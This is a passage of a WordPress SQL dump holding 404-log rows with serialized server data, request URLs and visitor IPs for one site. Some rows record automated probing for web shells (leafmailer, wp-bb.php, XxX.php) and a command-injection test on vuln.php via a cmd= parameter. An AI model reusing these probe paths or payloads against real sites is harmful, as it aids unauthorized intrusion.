(KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631326561.2865200042724609375;s:12:\"REQUEST_TIME\";i:1631326561;}}','notice','2021-09-11 02:16:03','2021-09-11 02:16:01',72604728,72688576,'http://zphiblgz.org/XxX.php',1,0,'95.216.2.218'),(96972,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631326564.176250934600830078125;s:12:\"REQUEST_TIME\";i:1631326564;}}','notice','2021-09-11 02:16:06','2021-09-11 02:16:04',72604752,72688592,'http://zphiblgz.org/leaf.php',1,0,'95.216.2.218'),(96973,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631326566.7291491031646728515625;s:12:\"REQUEST_TIME\";i:1631326566;}}','notice','2021-09-11 02:16:08','2021-09-11 02:16:06',72604896,72688752,'http://zphiblgz.org/leafmailer2.8.php',1,0,'95.216.2.218'),(96974,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631326569.1130950450897216796875;s:12:\"REQUEST_TIME\";i:1631326569;}}','notice','2021-09-11 02:16:11','2021-09-11 02:16:09',72604672,72688520,'http://zphiblgz.org/bb.php',1,0,'95.216.2.218'),(96975,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631326571.494223117828369140625;s:12:\"REQUEST_TIME\";i:1631326571;}}','notice','2021-09-11 02:16:13','2021-09-11 02:16:11',72604672,72688520,'http://zphiblgz.org/m.php',1,0,'95.216.2.218'),(96976,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631330043.0721681118011474609375;s:12:\"REQUEST_TIME\";i:1631330043;}}','notice','2021-09-11 03:14:05','2021-09-11 03:14:03',72611688,72694672,'https://zphiblgz.org/scholarship/application/',1,0,'185.100.87.202'),(96977,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631333001.5591800212860107421875;s:12:\"REQUEST_TIME\";i:1631333001;}}','notice','2021-09-11 04:03:23','2021-09-11 04:03:21',72603912,72687648,'http://zphiblgz.org/scholarship/application/',1,0,'92.38.136.69'),(96978,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:101:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631333172.7325470447540283203125;s:12:\"REQUEST_TIME\";i:1631333172;}}','notice','2021-09-11 04:06:14','2021-09-11 04:06:12',72609816,72693552,'http://zphiblgz.org/scholarship/application/',1,0,'176.222.58.7'),(96979,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631337698.9032819271087646484375;s:12:\"REQUEST_TIME\";i:1631337698;}}','notice','2021-09-11 05:21:41','2021-09-11 05:21:39',72634752,72717024,'https://zphiblgz.org/wp-bb.php?up2018info=1',1,0,'185.191.34.215'),(96980,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631343691.05914402008056640625;s:12:\"REQUEST_TIME\";i:1631343691;}}','notice','2021-09-11 07:01:34','2021-09-11 07:01:32',72629696,72712680,'https://zphiblgz.org/scholarship/application/',1,0,'107.189.13.254'),(96981,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631346440.636024951934814453125;s:12:\"REQUEST_TIME\";i:1631346440;}}','notice','2021-09-11 07:47:22','2021-09-11 07:47:20',72677664,72759864,'https://zphiblgz.org/vuln.php?cmd=php%20-r%20%27die(pi()*42)%3B%27',1,0,'185.191.34.215'),(96982,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631351770.5523850917816162109375;s:12:\"REQUEST_TIME\";i:1631351770;}}','notice','2021-09-11 09:16:12','2021-09-11 09:16:10',72603912,72687648,'http://zphiblgz.org/scholarship/application/',1,0,'209.159.150.78'),(96983,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631356048.71613788604736328125;s:12:\"REQUEST_TIME\";i:1631356048;}}','notice','2021-09-11 10:27:30','2021-09-11 10:27:28',72603912,72687648,'http://zphiblgz.org/scholarship/application/',1,0,'176.106.247.22'),(96984,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:47:\"text/html,application/xhtml+xml,application/xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:68:\"Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631359287.33876705169677734375;s:12:\"REQUEST_TIME\";i:1631359287;}}','notice','2021-09-11 11:21:29','2021-09-11 11:21:27',72603848,72687616,'http://zphiblgz.org/application',1,0,'3.219.218.250'),(96985,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631360838.8223779201507568359375;s:12:\"REQUEST_TIME\";i:1631360838;}}','notice','2021-09-11 11:47:25','2021-09-11 11:47:20',72603912,72687648,'http://zphiblgz.org/scholarship/application/',1,0,'180.167.101.134'),(96986,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631361054.7094080448150634765625;s:12:\"REQUEST_TIME\";i:1631361054;}}','notice','2021-09-11 11:50:56','2021-09-11 11:50:54',72603744,72687480,'http://zphiblgz.org/scholarship/application',1,0,'128.71.214.72'),(96987,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631361058.6424739360809326171875;s:12:\"REQUEST_TIME\";i:1631361058;}}','notice','2021-09-11 11:51:00','2021-09-11 11:50:58',72603744,72687480,'http://zphiblgz.org/scholarship/application',1,0,'128.71.214.72'),(96988,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631375361.72397708892822265625;s:12:\"REQUEST_TIME\";i:1631375361;}}','notice','2021-09-11 15:49:23','2021-09-11 15:49:21',72621920,72705656,'http://zphiblgz.org/scholarship/application/',1,0,'92.38.136.69'),(96989,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:7:\"deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:35:\"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631375581.369266033172607421875;s:12:\"REQUEST_TIME\";i:1631375581;}}','notice','2021-09-11 15:53:03','2021-09-11 15:53:01',72603992,72687728,'http://zphiblgz.org/scholarship/application/',1,0,'80.253.235.74'),(96990,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:52:\"text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631380908.9230759143829345703125;s:12:\"REQUEST_TIME\";i:1631380908;}}','notice','2021-09-11 17:21:51','2021-09-11 17:21:49',72611456,72694424,'https://zphiblgz.org/dup-installer/main.installer.php',1,0,'216.117.134.103'),(96991,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:52:\"text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631380913.2997949123382568359375;s:12:\"REQUEST_TIME\";i:1631380913;}}','notice','2021-09-11 17:21:55','2021-09-11 17:21:53',72603936,72687656,'http://zphiblgz.org/dup-installer/main.installer.php',1,0,'216.117.134.103'),(96992,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:1:\"*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:12:\"HTTP_REFERER\";s:20:\"https://zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631381145.209309101104736328125;s:12:\"REQUEST_TIME\";i:1631381145;}}','notice','2021-09-11 17:25:47','2021-09-11 17:25:45',72648136,72747432,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'103.231.89.163'),(96993,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.24 Safari/537.36 Edg/83.0.478.18\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631382698.0716030597686767578125;s:12:\"REQUEST_TIME\";i:1631382698;}}','notice','2021-09-11 17:51:42','2021-09-11 17:51:39',72621672,72705408,'http://zphiblgz.org/scholarship/application/',1,0,'178.213.21.185'),(96994,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631406263.8088939189910888671875;s:12:\"REQUEST_TIME\";i:1631406263;}}','notice','2021-09-12 00:24:30','2021-09-12 